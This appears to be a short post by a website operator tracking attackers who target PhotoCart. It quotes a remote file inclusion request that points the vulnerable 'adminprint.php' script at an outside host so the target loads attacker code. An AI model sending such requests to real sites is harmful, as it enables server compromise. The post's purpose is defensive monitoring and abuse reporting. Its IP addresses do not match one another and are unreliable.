The PhotoCart attackers regrouped quick after their other compromised server was cleaned up and launched a new wave based on the file they are trying to upload being hosted within Layeredtech.
The file is now being referenced here:
That's in the Layeredtech network somewhere:"/PhotoCart/adminprint.php?path=http://artelj.com/c.ar?"
host artelj.com has address 18.104.22.168This game of cat and mouse is getting old, but if they want to keep playing then I'll keep getting their playgrounds closed one at a time.
host 22.214.171.124 -> server2.soloymi.com.
OrgName: Layered Technologies, Inc.
NetRange: 126.96.36.199 - 188.8.131.52
The only upside today is the botnet that hit my server was much smaller than in the past and didn't include any IPs from theplanet.com, so perhaps they shut down those compromised locations. Will keep monitoring to see if theplanet.com IP's are used from this point forward to see if they resolved this or not.
Oh well, more letters to write to abuse@bunch-o-companies, sigh...
UPDATE: Looks like it might be the typical vulnerability hackers from Turkey as I caught them hitting my site looking for /PhotoCart/ using a Google INURL search.